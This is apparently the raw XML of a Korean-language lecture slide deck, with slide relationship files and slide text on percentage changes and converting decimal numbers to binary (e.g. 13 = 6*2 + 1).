<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image609.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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608.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image564.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image563.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide41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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image601.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide41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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide301.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41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2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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42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3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3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3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3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3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20.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439.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43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42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide438.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.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38.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide443.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44.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4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45.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611.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kocw.net/home/search/kemView.do?kemId=978503" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44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61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archive.ubuntu.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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slide" Target="slide442.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/" TargetMode="External"/><Relationship Id="rId9"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157.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide226.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide242.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide221.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide217.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide231.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide160.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide209.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.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57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.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101.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44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5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01.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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5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5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5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68.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide77.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide67.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide72.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide71.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide74.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide60.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide69.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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6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4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4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85.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide94.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId2"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91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide98.xml"/></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81.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83.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8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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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81.xml"/><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slide" Target="slide442.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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42.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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><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6.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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0520"/>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0520"/>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811" y="2324145"/>
            <a:ext cx="2421195" cy="18261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171" y="1104272"/>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940"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삼성이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>13% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</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905240"/>
            <a:ext cx="2247007" cy="740529"/>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카카오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>43.6875% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</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4224" y="647541"/>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426314"/>
            <a:ext cx="2435702" cy="810406"/>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t>비트코인은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>-43% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>떨어졌어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519C2B79-3073-4430-9E9D-90253A5F30C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689470" y="1674855"/>
            <a:ext cx="712354" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>양수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8607C0-93B5-4FB9-9A46-5ACC2CFE7C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211428" y="1990874"/>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1999694" y="2831213"/>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444049" y="1654307"/>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a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2035995"/>
            <a:ext cx="171159" cy="288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726903" y="2065255"/>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983276" y="2349881"/>
            <a:ext cx="446015" cy="623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flipH="1">
            <a:off x="2286000" y="3200545"/>
            <a:ext cx="45640" cy="34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 descr="A tech walkthrough of metal gate I/O transistors(3)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1AD486-1CFE-4D12-AEF8-275E1FAC53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8006" y="2324145"/>
            <a:ext cx="2586672" cy="1826190"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108A071A-CAEA-451A-9968-3FBE806DB353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756810" y="4150335"/>
            <a:ext cx="5003045" cy="2306466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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양수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C 언어 코딩 도장: 36.9 배열을 활용하여 10진수를 2진수로 변환하기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D9718F-035F-4889-91F3-E2C2C5525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427" y="2363343"/>
            <a:ext cx="5607150" cy="309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503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87E3274D-1B65-4BEE-B181-1C4011C39B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="210921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(10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3F50D9-455D-47B7-A559-C99BE2ADA1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2755392" y="2478548"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100   + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E42E42-3E4B-4567-AC5C-75B17D2EC170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="303254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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7758AB-604C-4974-B7A0-EF63BFA9C7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="364078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(2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 8 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9750EAFF-2D35-45D4-A521-E350023D6161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2767584" y="4010121"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9CFC94-5A14-40BD-9076-150E1E88D159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="456411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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="직선 화살표 연결선 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E253C8-FEE4-414F-B183-C27EE0BC841F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2936759"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8F39380-F8D4-400C-A246-A947094C4C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278379" y="5447310"/>
            <a:ext cx="2953146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13    =  6*2 +1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40967FA-D68D-451D-A1CC-B3E2F609FDFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="4564119"/>
            <a:ext cx="6272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2A3D4518-B158-4E3D-ADEB-049F551C7DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3534992" y="4564119"/>
            <a:ext cx="439921"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C1C4F32D-5AAD-49E6-B52A-77C9A26E2D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3754952"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7" name="직선 연결선 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264AC1A1-71BB-42F4-A54D-F1DC9AA44D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="3401878"/>
            <a:ext cx="12177027" cy="136164"/>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B5A81AB-DD64-47D1-A527-CD4509663207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996902" y="6113661"/>
            <a:ext cx="8765223" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현하려면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,  6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현한후 뒤에 </a:t>
            </a:r>
            <a:r>
